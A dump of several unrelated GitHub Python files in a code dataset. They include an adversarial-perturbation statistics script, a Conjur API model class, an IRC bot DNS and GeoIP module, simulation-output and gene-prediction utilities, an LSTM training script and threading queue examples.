tqdm(os.listdir(raw_path)): # 对一张图片开始实验\r\n label = re.match(patten, file).group()\r\n int_label = torch.tensor(label_dict[label]).argmax().item()\r\n image_path = raw_path + '/' + file\r\n # preprocess input\r\n image = solve_input(image_path)\r\n image_ = copy.deepcopy(image)\r\n predict = model(image)\r\n if(label not in label_result):\r\n label_result[label]={}\r\n if (predict.argmax() == int_label):\r\n pertubaed_image = one_file_test(model, image ,image_, int_label, num,flag=2)\r\n a = torch.nonzero(pertubaed_image-image)\r\n for i in range(0,len(a)):\r\n temp = tuple(a[i].numpy()[1:])\r\n if(temp in label_result[label]):\r\n label_result[label][temp] = label_result[label][temp]+1\r\n else:\r\n label_result[label][temp] = 1\r\n\r\n for i in label_dict:\r\n sheet = book.add_sheet(i, cell_overwrite_ok=True)\r\n sorted_item = sorted(label_result[i].items(),key=lambda x:x[1],reverse=True)\r\n for j in range(0,10):\r\n sheet.write(j, 0, str(sorted_item[j][0]))\r\n sheet.write(j, 1, str(sorted_item[j][1]))\r\n\r\n book.save(\"union_loss_field.xls\")\r\n return None\r\n\r\n\r\n\r\n\r\nimport time\r\nfrom utils.recode import recode_data\r\nif __name__==\"__main__\":\r\n # Statistics_Field()\r\n raw_path = \"../dataset/npy_dataset/test/facebook_Audio_test8.npy\"\r\n # col = ['k', 'SR', 'AP', 'score(micro)', 'score(macro)','time_cost']\r\n # for i in range(5,16):\r\n # start = time.time()\r\n # rows = more_file_test(raw_path, i)\r\n # rows = list(rows)\r\n # end_time = time.time()\r\n # print(type(rows))\r\n # rows.append(end_time-start)\r\n # recode_data(\"union_loss\",rows,col)\r\n # start = time.time()\r\n # more_file_test(raw_path, 15)\r\n # end_time = time.time()\r\n # print(\"time cost:\",end_time-start)\r\n\r\n # start = time.time()\r\n # statistic_fields(raw_path,15)\r\n # end_time = time.time()\r\n # print(\"time cost:\",end_time-start)\r\n model = torch.load(\"model.pkl\")\r\n data = solve_input(raw_path)\r\n data_copy = copy.deepcopy(data)\r\n x = one_file_test(model, data,data_copy, torch.tensor(2),flag=2)\r\n x = torch.reshape(x,(32,32)).detach().numpy()\r\n plt.imshow(x)\r\n plt.show()\r\n","repo_name":"lpf-2001/ad_attack","sub_path":"union_loss/union_loss.py","file_name":"union_loss.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33929272899","text":"# coding: utf-8\n\n\"\"\"\n Conjur\n\n This is an API definition for CyberArk Conjur Open Source. You can find out more at [Conjur.org](https://www.conjur.org/). # noqa: E501\n\n The version of the OpenAPI document: 5.3.0\n Contact: conj_maintainers@cyberark.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom conjur.configuration import Configuration\n\n\nclass LoadedPolicy(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'created_roles': 'object',\n 'version': 'float'\n }\n\n attribute_map = {\n 'created_roles': 'created_roles',\n 'version': 'version'\n }\n\n def __init__(self, created_roles=None, version=None, local_vars_configuration=None): # noqa: E501\n \"\"\"LoadedPolicy - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._created_roles = None\n self._version = None\n self.discriminator = None\n\n if created_roles is not None:\n self.created_roles = created_roles\n if version is not None:\n self.version = version\n\n @property\n def created_roles(self):\n \"\"\"Gets the created_roles of this LoadedPolicy. # noqa: E501\n\n\n :return: The created_roles of this LoadedPolicy. # noqa: E501\n :rtype: object\n \"\"\"\n return self._created_roles\n\n @created_roles.setter\n def created_roles(self, created_roles):\n \"\"\"Sets the created_roles of this LoadedPolicy.\n\n\n :param created_roles: The created_roles of this LoadedPolicy. # noqa: E501\n :type: object\n \"\"\"\n\n self._created_roles = created_roles\n\n @property\n def version(self):\n \"\"\"Gets the version of this LoadedPolicy. # noqa: E501\n\n\n :return: The version of this LoadedPolicy. # noqa: E501\n :rtype: float\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"Sets the version of this LoadedPolicy.\n\n\n :param version: The version of this LoadedPolicy. # noqa: E501\n :type: float\n \"\"\"\n\n self._version = version\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, LoadedPolicy):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, LoadedPolicy):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"jodyhuntatx/python_test","sub_path":"py_client/conjur/models/loaded_policy.py","file_name":"loaded_policy.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35850782940","text":"#--depends-on commands\n\nimport re, socket, typing\nfrom src import ModuleManager, utils\nimport dns.resolver\n\nURL_GEOIP = \"http://ip-api.com/json/%s\"\nREGEX_IPv6 = r\"(?:(?:[a-f0-9]{1,4}:){2,}|[a-f0-9:]*::)[a-f0-9:]*\"\nREGEX_IPv4 = r\"(?:\\d{1,3}\\.){3}\\d{1,3}\"\nREGEX_IP = re.compile(\"%s|%s\" % (REGEX_IPv4, REGEX_IPv6), re.I)\n\ndef _parse(value):\n if utils.is_ip(value):\n return value\n return None\n\n@utils.export(\"botset\", utils.BoolSetting(\"configurable-nameservers\",\n \"Whether or not users can configure their own nameservers\"))\n@utils.export(\"serverset\", utils.FunctionSetting(_parse, \"dns-nameserver\",\n \"Set DNS nameserver\", example=\"8.8.8.8\"))\n@utils.export(\"channelset\", utils.FunctionSetting(_parse, \"dns-nameserver\",\n \"Set DNS nameserver\", example=\"8.8.8.8\"))\nclass Module(ModuleManager.BaseModule):\n @utils.hook(\"received.command.dns\", min_args=1)\n def dns(self, event):\n \"\"\"\n :help: Get all addresses for a given hostname (IPv4/IPv6)\n :usage: [type [type ...]]\n :prefix: DNS\n \"\"\"\n args = event[\"args_split\"][:]\n nameserver = None\n if self.bot.get_setting(\"configurable-nameservers\", True):\n nameserver = event[\"target\"].get_setting(\"dns-nameserver\",\n event[\"server\"].get_setting(\"dns-nameserver\", None))\n for i, arg in enumerate(args):\n if arg[0] == \"@\":\n nameserver = args.pop(i)[1:]\n break\n\n hostname = args[0]\n\n record_types = args[1:]\n if not record_types:\n record_types = [\"A?\", \"AAAA?\"]\n\n if not nameserver == None:\n resolver = dns.resolver.Resolver(configure=False)\n resolver.nameservers = [nameserver]\n else:\n resolver = dns.resolver\n\n results = []\n\n for record_type in record_types:\n record_type_strip = record_type.rstrip(\"?\").upper()\n try:\n query_result = resolver.query(hostname, record_type_strip,\n lifetime=4)\n query_results = [q.to_text() for q in query_result]\n results.append([record_type_strip, query_result.rrset.ttl,\n query_results])\n except dns.resolver.NXDOMAIN:\n raise utils.EventError(\"Domain not found\")\n except dns.resolver.NoAnswer:\n if not record_type.endswith(\"?\"):\n raise utils.EventError(\"Domain does not have a '%s' record\"\n % record_type_strip)\n except dns.rdatatype.UnknownRdatatype:\n raise utils.EventError(\"Unknown record type '%s'\"\n % record_type_strip)\n except dns.exception.DNSException:\n message = \"Failed to get DNS records\"\n self.log.warn(message, exc_info=True)\n raise utils.EventError(message)\n\n results_str = [\"%s (TTL %s): %s\" %\n (t, ttl, \", \".join(r)) for t, ttl, r in results]\n event[\"stdout\"].write(\"(%s) %s\" % (hostname, \" | \".join(results_str)))\n\n @utils.hook(\"received.command.geoip\", min_args=1)\n def geoip(self, event):\n \"\"\"\n :help: Get geoip data on a given IPv4/IPv6 address\n :usage: \n :prefix: GeoIP\n \"\"\"\n page = utils.http.request(URL_GEOIP % event[\"args_split\"][0]).json()\n if page:\n if page[\"status\"] == \"success\":\n data = page[\"query\"]\n data += \" | Organisation: %s\" % page[\"org\"]\n data += \" | City: %s\" % page[\"city\"]\n data += \" | Region: %s (%s)\" % (\n page[\"regionName\"], page[\"countryCode\"])\n data += \" | ISP: %s\" % page[\"isp\"]\n data += \" | Lon/Lat: %s/%s\" % (page[\"lon\"], page[\"lat\"])\n data += \" | Timezone: %s\" % page[\"timezone\"]\n event[\"stdout\"].write(data)\n else:\n event[\"stderr\"].write(\"No geoip data found\")\n else:\n raise utils.EventResultsError()\n\n @utils.hook(\"received.command.rdns\")\n def rdns(self, event):\n \"\"\"\n :help: Do a reverse-DNS look up on an IPv4/IPv6 address\n :usage: \n :prefix: rDNS\n \"\"\"\n ip = event[\"args_split\"][0] if event[\"args\"] else \"\"\n if not ip:\n line = event[\"target\"].buffer.find(REGEX_IP)\n if line:\n ip = line.match\n if not ip:\n raise utils.EventError(\"No IP provided\")\n\n try:\n hostname, alias, ips = socket.gethostbyaddr(ip)\n except (socket.herror, socket.gaierror) as e:\n raise utils.EventError(e.strerror)\n event[\"stdout\"].write(\"(%s) %s\" % (ips[0], hostname))\n","repo_name":"bitbot-irc/bitbot","sub_path":"modules/ip_addresses.py","file_name":"ip_addresses.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"67"} +{"seq_id":"16298687549","text":"import os\nimport re\nimport time\nimport shutil\nimport sqlite3\nimport multiprocessing\n\nfrom ADSMSettings.utils import workspace_path, scenario_filename\n\n\nclass CombineOutputsGenerator(multiprocessing.Process):\n import django\n django.setup()\n\n def __init__(self, **kwargs):\n super(CombineOutputsGenerator, self).__init__(**kwargs)\n\n def run(self):\n\n supplemental_location = workspace_path(scenario_filename() + \"\\\\\" \"Supplemental Output Files\" + '\\\\') # Note: scenario_filename uses the database\n scenario_name = scenario_filename()\n db_location = workspace_path(scenario_filename() + \".db\")\n\n combine_outputs(supplemental_location, db_location, scenario_name)\n\n\ndef combine_outputs(supplemental_output_folder, db_location, simulation_name):\n\n all_files = os.listdir(supplemental_output_folder)\n\n states_files = [file for file in all_files if \"states\" in file]\n exposures_files = [file for file in all_files if \"daily_exposures\" in file]\n events_files = [file for file in all_files if \"daily_events\" in file]\n\n output_dir = supplemental_output_folder + \"Combined Outputs\\\\\"\n\n building_dir = True\n while building_dir:\n try:\n os.makedirs(output_dir)\n building_dir = False\n except FileExistsError:\n shutil.rmtree(output_dir)\n os.makedirs(output_dir)\n except PermissionError:\n pass\n\n iterations_run = max([len(exposures_files), len(events_files), len(states_files)])\n\n if iterations_run == 0:\n iterations_run = \"UNKNOWN\"\n\n if len(exposures_files) > 0:\n exposure_days = build_exposures(supplemental_output_folder, exposures_files, output_dir)\n else:\n exposure_days = 0\n file = open(supplemental_output_folder + \"/Combined Outputs/\" + \"combined_daily_exposures.csv\", \"w\")\n file.close()\n\n if len(events_files) > 0:\n events_days = build_events(supplemental_output_folder, events_files, output_dir)\n else:\n events_days = 0\n file = open(supplemental_output_folder + \"/Combined Outputs/\" + \"combined_daily_events.csv\", \"w\")\n file.close()\n\n if len(states_files) > 0:\n states_days = build_states(supplemental_output_folder, states_files, output_dir)\n else:\n states_days = 0\n file = open(supplemental_output_folder + \"/Combined Outputs/\" + \"combined_states.csv\", \"w\")\n file.close()\n\n # days_per_iteration = get_days_from_database(db_location)\n # total_outbreak_days = sum(days_per_iteration)\n\n file = open(output_dir + \"/\" + \"combined_metadata.txt\", \"w\")\n\n file.write(\"Simulation Name: \" + simulation_name + \"\\n\")\n file.write(\"\\n\")\n file.write(\"Number of Iterations Run: \" + str(iterations_run) + \"\\n\")\n file.write(\"\\n\")\n file.write(\"Total Number of Lines in Exposures Combined Output: \" + str(exposure_days) + \"\\n\")\n file.write(\"Total Number of Lines in Events Combined Output: \" + str(events_days) + \"\\n\")\n file.write(\"Total Number of Lines in States Combined Output: \" + str(states_days) + \"\\n\")\n '''\n file.write(\"\\n\")\n file.write(\"Total Outbreak Days: \" + str(total_outbreak_days) + \"\\n\")\n file.write(\"Days in each Iteration:\" + \"\\n\")\n for index, iteration in enumerate(days_per_iteration):\n file.write(\"\\t\" + \"Iteration \" + str(index + 1) + \": \" + str(iteration) + \"\\n\")\n '''\n\n file.close()\n\n\ndef get_header(file):\n file = open(file, \"r\")\n header = file.readlines()[0]\n file.close()\n return header\n\n\ndef build_states(in_path, files, out_path):\n header = get_header(in_path + \"/\" + files[0])\n\n data = []\n\n for file in files:\n next_file = open(in_path + \"/\" + file, \"r\")\n new_data = [line.replace(\"\\n\", \"\") for line in next_file.readlines()][1:]\n data += new_data\n\n file = open(out_path + \"/\" + \"combined_states.csv\", \"w\")\n file.write(header)\n for line in data:\n file.write(line + \"\\n\")\n file.close()\n\n return len(data) + 1\n\n\ndef build_exposures(in_path, files, out_path):\n header = get_header(in_path + \"/\" + files[0])\n\n data = []\n\n for file in files:\n next_file = open(in_path + \"/\" + file, \"r\")\n new_data = [line.replace(\"\\n\", \"\") for line in next_file.readlines()][1:]\n data += new_data\n\n file = open(out_path + \"/\" + \"combined_daily_exposures.csv\", \"w\")\n file.write(header)\n for line in data:\n file.write(line + \"\\n\")\n file.close()\n\n return len(data) + 1\n\n\ndef build_events(in_path, files, out_path):\n header = get_header(in_path + \"/\" + files[0])\n\n data = []\n\n for file in files:\n next_file = open(in_path + \"/\" + file, \"r\")\n new_data = [line.replace(\"\\n\", \"\") for line in next_file.readlines()][1:]\n data += new_data\n\n file = open(out_path + \"/\" + \"combined_daily_events.csv\", \"w\")\n file.write(header)\n for line in data:\n file.write(line + \"\\n\")\n file.close()\n\n return len(data) + 1\n\n\n'''\ndef get_days_from_database(database_location):\n\n db = sqlite3.connect(database_location)\n cursor = db.cursor()\n cursor.execute(\n 'SELECT day, last_day, CASE WHEN last_day = \"1\" THEN \"day\" ELSE NULL END AS last_day FROM \"Results_dailycontrols\"'\n )\n daily_controls = cursor.fetchall()\n db.close()\n\n days_list = []\n for item in daily_controls:\n if item[2]:\n days_list.append(item[2])\n return days_list\n'''\n","repo_name":"NAVADMC/ADSM","sub_path":"Results/combine_outputs.py","file_name":"combine_outputs.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"21322596110","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPurpose\n-------\n\nThis module contains functions related with gene prediction\nwith Pyrodigal.\n\nCode documentation\n------------------\n\"\"\"\n\n\nimport pyrodigal\n\ntry:\n from utils import (constants as ct,\n file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\nexcept ModuleNotFoundError:\n from CHEWBBACA.utils import (constants as ct,\n file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\n\n\ndef create_gene_finder(training_data, closed, mask, meta):\n \"\"\"Create a Pyrodigal GeneFinder object.\n\n Parameters\n ----------\n training_data : pyrodigal.TrainingInfo\n A training info instance used to predict genes in single\n mode.\n closed : bool\n True to prevent prediction of partial genes at edges of\n sequences, False otherwise.\n meta: bool\n True to run Prodigal in `meta` mode (uses pre-trained\n profiles).\n\n Returns\n -------\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object configured based on provided arguments.\n \"\"\"\n gene_finder = pyrodigal.GeneFinder(training_info=training_data,\n closed=closed,\n mask=mask,\n meta=meta)\n\n return gene_finder\n\n\ndef train_gene_finder(gene_finder, sequences, translation_table):\n \"\"\"Train a Pyrodigal GeneFinder object based on a set of sequences.\n\n Parameters\n ----------\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object.\n sequences : list\n Sequences used to train the GeneFinder (list\n of bytes objects).\n translation_table : int\n Translation table to use.\n\n Return\n ------\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object configured based on provided arguments.\n \"\"\"\n gene_finder.train(*sequences, translation_table=translation_table)\n\n return gene_finder\n\n\ndef read_training_file(training_file):\n \"\"\"Load training info for Pyrodigal from Prodigal training file.\n\n Parameters\n ----------\n training_file : str\n Path to Prodigal training file.\n\n Returns\n -------\n training_data : pyrodigal.TrainingInfo\n The deserialized training info.\n \"\"\"\n with open(training_file, 'rb') as infile:\n training_data = pyrodigal.TrainingInfo.load(infile)\n\n return training_data\n\n\ndef get_gene_info(contig_id, genome_id, protid, genes):\n \"\"\"Get genes information from a pyrodigal.Genes object.\n\n Parameters\n ----------\n contig_id : str\n The unique identifier of the sequence/contig.\n genome_id : str\n The unique identifier of the genome/file.\n protid : int\n The integer identifier to attriute to the first gene.\n genes : pyrodigal.Genes\n The list of genes predicted by Prodigal.\n\n Returns\n -------\n gene_info : list\n List with one sublist per gene predicted. Each sublist\n includes the sequence SHA256 hash, the DNA sequence, the\n genome identifier, the contig identifier, the start position\n in the sequence, the end position, the integer identifier and\n the strand the gene was identified in.\n protid : int\n The integer identifier to attribute to the first gene\n in the next sequence/contig.\n \"\"\"\n gene_info = []\n for gene in genes:\n sequence = gene.sequence()\n sequence_hash = im.hash_sequence(sequence)\n gene_info.append([sequence_hash, sequence, genome_id, contig_id,\n str(gene.begin), str(gene.end), str(protid),\n str(gene.strand)])\n protid += 1\n\n return gene_info, protid\n\n\ndef write_gene_fasta(gene_info, output_file):\n \"\"\"Write a FASTA file based on the results returned by `get_gene_info`.\n\n Parameters\n ----------\n gene_info : list\n List with the data for the genes returned by `get_gene_info`.\n output_file : str\n Path to the output FASTA file.\n \"\"\"\n fasta_sequences = []\n for gene in gene_info:\n fasta_str = ct.FASTA_CDS_TEMPLATE.format(gene[2], gene[6], gene[1])\n fasta_sequences.append(fasta_str)\n fo.write_lines(fasta_sequences, output_file)\n\n\ndef write_coordinates_pickle(gene_info, contig_sizes, output_file):\n \"\"\"Write gene coordinates to a pickle file.\n\n Parameters\n ----------\n gene_info : list\n List with the data for the genes returned by `get_gene_info`.\n contig_sizes : dict\n Dictionary with contig/sequence identifiers as keys and\n contig/sequence size as values.\n output_file : str\n Path to the output file.\n \"\"\"\n gene_coordinates = {}\n for gene in gene_info:\n gene_coordinates.setdefault(gene[0], []).append(gene[2:])\n fo.pickle_dumper([gene_coordinates, contig_sizes], output_file)\n\n\ndef predict_genome_genes(input_file, output_directory, gene_finder,\n translation_table):\n \"\"\"Predict genes for sequences in a FASTA file.\n\n Parameters\n ----------\n input_file : str\n Path to the FASTA file.\n output_directory : str\n Path to the output_directory to store files with\n the results.\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object.\n translation_table : int\n Translation table used to configure the GeneFinder\n (None type if the GeneFinder does not need to be\n configured).\n\n Returns\n -------\n input_file : str\n Path to the input FASTA file.\n total_genome : int\n Total number of genes predicted.\n fasta_outfile : str\n Path to the output FASTA file that contains the\n predited gene sequences.\n coordinates_outfile : str\n Path to the output pickle file that contains the gene\n coordinates and contig size data.\n \"\"\"\n # Get genome unique identifier\n genome_basename = input_file[1]\n records = fao.sequence_generator(input_file[0])\n records = {rec.id: bytes(rec.seq) for rec in records}\n contig_sizes = {recid: len(sequence)\n for recid, sequence in records.items()}\n\n # Train based on input sequences\n # Only train if object does not contain training info\n # and if it won't run in meta mode\n if gene_finder.training_info is None and gene_finder.meta is False:\n gene_finder = train_gene_finder(gene_finder,\n records.values(),\n translation_table)\n\n # Predict genes for all input contigs\n contig_genes = {}\n for recid, sequence in records.items():\n genes = gene_finder.find_genes(sequence)\n contig_genes[recid] = genes\n\n # Extract data from Gene objects\n protid = 1\n gene_info = []\n for recid, genes in contig_genes.items():\n data = get_gene_info(recid, genome_basename, protid, genes)\n gene_info.extend(data[0])\n protid = data[1]\n\n total_genome = len(gene_info)\n fasta_outfile = None\n coordinates_outfile = None\n if total_genome > 0:\n # Create FASTA file with DNA sequences\n fasta_outfile = fo.join_paths(output_directory,\n [f'{genome_basename}.fasta'])\n write_gene_fasta(gene_info, fasta_outfile)\n\n # Save gene coordinates and contig sizes to pickle\n coordinates_outfile = fo.join_paths(output_directory,\n [f'{genome_basename}.coordinates'])\n write_coordinates_pickle(gene_info, contig_sizes, coordinates_outfile)\n\n return [input_file, total_genome, fasta_outfile, coordinates_outfile]\n","repo_name":"B-UMMI/chewBBACA","sub_path":"CHEWBBACA/utils/gene_prediction.py","file_name":"gene_prediction.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"} +{"seq_id":"30348304687","text":"n = int(input())\r\ncount = n\r\nk = []\r\nfor i in range(1, n+1):\r\n if count - i <= 0:\r\n if k.count(count) != 0:\r\n p = k.pop()\r\n k.append(count + p)\r\n break\r\n else:\r\n k.append(count)\r\n break\r\n else:\r\n count = count - i\r\n k.append(i)\r\nprint(len(k))\r\nfor i in range(len(k)):\r\n print(k[i], end = \" \")\r\n","repo_name":"TopGitUser/Hello-world","sub_path":"4.1.3.py","file_name":"4.1.3.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14126840586","text":"import numpy as np\nimport torch\nfrom data_loader import data_loading_concept, data_loading_speak\nfrom main_function import feature_extrac, speak_detection\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nConcepts = [\n 'Inner_Brow_Raiser', # AU01 # 00\n 'Outer_Brow_Raiser', # AU02 # 01\n 'Brow_Lowerer', # AU04 # 02\n 'Upper_Lid_Raiser', # AU05 # 03\n 'Cheek_Raiser', # AU06 # 04\n 'Lid_Tightener', # AU07 # 05\n 'Nose_Wrinkler', # AU09 # 06\n 'Upper_Lip_Raiser', # AU10 # 07\n 'Lip_Corner_Puller', # AU12 # 08\n 'Dimpler', # AU14 # 09\n 'Lip_Corner_Depressor', # AU15 # 10\n 'Chin_Raiser', # AU17 # 11\n 'Lip_stretcher', # AU20 # 12\n 'Lip_Tightener', # AU23 # 13\n 'Lips_part', # AU25 # 14\n 'Jaw_Drop', # AU26 # 15\n 'Lip_Suck', # AU28 # 16\n 'Blink' # AU45 # 17\n]\nusers = [\n 'adityarathore', # 00\n 'Caitlin_Chan', # 01\n 'Amy_Zhang', # 02\n 'Anarghya', # 03\n 'aniruddh', # 04\n 'anthony', # 05\n 'baron_huang', # 06\n 'bhuiyan', # 07\n 'chandler', # 08\n 'chenyi_zou', # 09\n 'deepak_joseph', # 10\n 'dunjiong_lin', # 11\n 'Eric_Kim', # 12\n 'FrankYang', # 13\n 'giorgi_datashvili', # 14\n 'Huining_Li', # 15\n 'jonathan', # 16\n 'Kunjie_Lin', # 17\n 'lauren', # 18\n 'moohliton', # 19\n 'phoung', # 20\n 'Tracy_chen' # 21\n]\n\nif __name__ == '__main__':\n data_path = '/mnt/stuff/xiaoyu/data/' # the path where 'x_data.npy' and 'y_data.npy' are located\n model_type = 'LSTM/' # the type of the sub_model\n\n features = [] # the index of feature in target layer for all concepts\n layers = [] # the index of target layer for all concepts\n # features = np.zeros(len(Concepts)) # the index of feature in target layer for all concepts\n # features = features.astype(int)\n # layers = np.zeros(len(Concepts)) # the index of target layer for all concepts\n # layers = layers.astype(int)\n # train all the sub_models for all the concept respectively\n for label_index in range(len(Concepts)):\n x_train, y_train, x_test, y_test = data_loading_concept(label_index, data_path)\n feature_index, max_layer = feature_extrac(x_train, y_train, x_test, y_test, label_index, model_type)\n features.append(feature_index)\n layers.append(max_layer)\n\n # since the time cost of the function data_load_speak is too high, we save the outcome into the directory \"data\"\n if not os.path.exists('data/x_train.npy'):\n x_train, y_train, label_train, level_train, x_test, y_test, label_test, level_test = data_loading_speak(data_path)\n np.save('data/x_train.npy', x_train)\n np.save('data/y_train.npy', y_train)\n np.save('data/label_train.npy', label_train)\n np.save('data/level_train.npy', level_train)\n np.save('data/x_test.npy', x_test)\n np.save('data/y_test.npy', y_test)\n np.save('data/label_test.npy', label_test)\n np.save('data/level_test.npy', level_test)\n\n # load the data for speak intent model training and testing\n x_train = np.load('data/x_train.npy')\n y_train = np.load('data/y_train.npy')\n label_train = np.load('data/label_train.npy')\n level_train = np.load('data/level_train.npy')\n x_test = np.load('data/x_test.npy')\n y_test = np.load('data/y_test.npy')\n label_test = np.load('data/label_test.npy')\n level_test = np.load('data/level_test.npy')\n\n # speak intent model training and testing\n speak_detection(x_train, y_train, label_train, level_train, x_test, y_test, label_test, level_test, features, layers, model_type)","repo_name":"zxy340/LSTM_SpeakIntent","sub_path":"LSTM_SpeakIntent/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40133876400","text":"import time\nfrom collections import deque\nfrom queue import Queue\nfrom threading import Lock, Thread\n\nfrom rich import print\nfrom cnp.utils import timer\n\n\nclass MyQueue:\n\n def __init__(self):\n self.items = deque()\n self.lock = Lock()\n\n def put(self, item):\n with self.lock:\n self.items.append(item)\n\n def get(self):\n with self.lock:\n return self.items.popleft()\n\n\nclass ClosableQueue(Queue):\n SENTINEL = object()\n\n def close(self):\n self.put(self.SENTINEL)\n\n def __iter__(self):\n while True:\n item = self.get()\n try:\n if item is self.SENTINEL:\n return\n # raise StopIteration\n yield item\n finally:\n self.task_done()\n\n\nclass Worker(Thread):\n\n def __init__(self, func, in_queue, out_queue):\n super().__init__()\n self.func = func\n self.in_queue = in_queue\n self.out_queue = out_queue\n self.polled_count = 0\n self.work_done = 0\n\n def run(self):\n while True:\n self.polled_count += 1\n try:\n item = self.in_queue.get()\n except IndexError:\n time.sleep(.01)\n else:\n result = self.func(item)\n self.out_queue.put(result)\n self.work_done += 1\n\n\nclass StoppableWorker(Thread):\n\n def __init__(self, func, in_queue, out_queue):\n super().__init__()\n self.func = func\n self.in_queue = in_queue\n self.out_queue = out_queue\n\n def run(self):\n for item in self.in_queue:\n result = self.func(item)\n self.out_queue.put(result)\n\n\ndef download(item):\n # print(f'____downloading {item} ... ')\n time.sleep(.003)\n\n\ndef resize(item):\n # print(f'____resizing {item} ... ')\n time.sleep(.001)\n\n\ndef upload(item):\n # print(f'____uploading {item} ... ')\n time.sleep(.005)\n\n\n@timer\ndef commence_task_flow():\n download_queue = MyQueue()\n resize_queue = MyQueue()\n upload_queue = MyQueue()\n done_queue = MyQueue()\n\n threads = [\n Worker(download, download_queue, resize_queue),\n Worker(resize, resize_queue, upload_queue),\n Worker(upload, upload_queue, done_queue),\n ]\n\n for thread in threads:\n thread.start()\n\n for _ in range(1000):\n download_queue.put(object())\n\n while len(done_queue.items) < 1000:\n print('Waiting for processing...')\n time.sleep(5)\n\n processed = len(done_queue.items)\n polled = sum(t.polled_count for t in threads)\n print(f'Processed {processed} items after polling {polled} times')\n\n\n@timer\ndef commence_task_flow_with_queue():\n download_queue = ClosableQueue()\n resize_queue = ClosableQueue()\n upload_queue = ClosableQueue()\n done_queue = ClosableQueue()\n\n threads = [\n StoppableWorker(download, download_queue, resize_queue),\n StoppableWorker(resize, resize_queue, upload_queue),\n StoppableWorker(upload, upload_queue, done_queue),\n ]\n\n for thread in threads:\n thread.start()\n\n for _ in range(1000):\n download_queue.put(object())\n\n download_queue.close()\n download_queue.join()\n resize_queue.close()\n resize_queue.join()\n upload_queue.close()\n upload_queue.join()\n\n print(f'{done_queue.qsize()} items finished')\n\n for thread in threads:\n thread.join()\n\n\ndef start_threads(count, *args):\n threads = [StoppableWorker(*args) for _ in range(count)]\n for thread in threads:\n thread.start()\n return threads\n\n\ndef stop_threads(closable_queue, threads):\n for _ in threads:\n closable_queue.close()\n closable_queue.join()\n for thread in threads:\n thread.join()\n\n\n@timer\ndef commence_task_flow_with_queue_cleaner():\n download_queue = ClosableQueue()\n resize_queue = ClosableQueue()\n upload_queue = ClosableQueue()\n done_queue = ClosableQueue()\n\n download_thread = start_threads(3, download, download_queue, resize_queue)\n resize_thread = start_threads(4, resize, resize_queue, upload_queue)\n upload_thread = start_threads(5, upload, upload_queue, done_queue)\n\n for _ in range(1000):\n download_queue.put(object())\n\n stop_threads(download_queue, download_thread)\n stop_threads(resize_queue, resize_thread)\n stop_threads(upload_queue, upload_thread)\n\n print(f'{done_queue.qsize()} items finished')\n","repo_name":"EffectivePythonExercises/ConcurrencyAndParallelism","sub_path":"cnp/use_queue.py","file_name":"use_queue.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74976159892","text":"# coding:utf-8\nimport numpy as np\nimport azurflow_defs as ad\nfrom keras.preprocessing.image import load_img, img_to_array\n\n# some functions used in azurflow\n\n# load image and return fixed image array\ndef load_image(image_path):\n img_array = img_to_array(load_img(image_path))\n img_array /= 255 # 画像配列は255で割って使うのがしきたりらしい\n return img_array\n\n# load memory and return train data\n# (in) memory_name: name of 